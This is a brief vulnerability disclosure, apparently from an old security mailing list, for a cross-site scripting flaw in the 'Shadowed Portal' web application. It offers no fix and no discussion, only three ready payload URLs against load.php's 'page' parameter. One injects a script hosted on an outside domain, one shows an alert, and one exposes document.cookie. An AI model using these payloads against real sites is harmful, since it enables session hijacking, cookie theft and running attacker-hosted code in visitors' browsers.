

| Risk |
Local |
| Remote |
| Low |
Yes |
| Yes |
------------------------------------------------------------------------
-------------
Shadowed Portal Cross Site Scripting
Site:http://www.shad0wed.com/
Demo:http://www.shad0wed.com/
---------------------------------------------------
Credit : Liz0ziM
webpage:www.biyo.tk www.biyosecurity.be
Mail :liz0 (at) bsdmail (dot) com [email concealed]
------------------------------------------------------------------------
-------------
Shadowed Portal
http://victim/path/load.php?mod=pages&page="><script
src=http://liz0.li.funpic.org/hacked.js></script>
http://victim/path/load.php?mod=pages&page="><script>alert(/BiyoSecurity
Team/)</script>
http://victim/path/load.php?mod=pages&page="><script>alert(document.cook
ie)</script>
------------------------------------------------------------------------
----------------
Source:
http://www.blogcu.com/Liz0ziM/350164/
http://liz0zim.no-ip.org/shad0w.txt
[ ASCII VERSION ]
|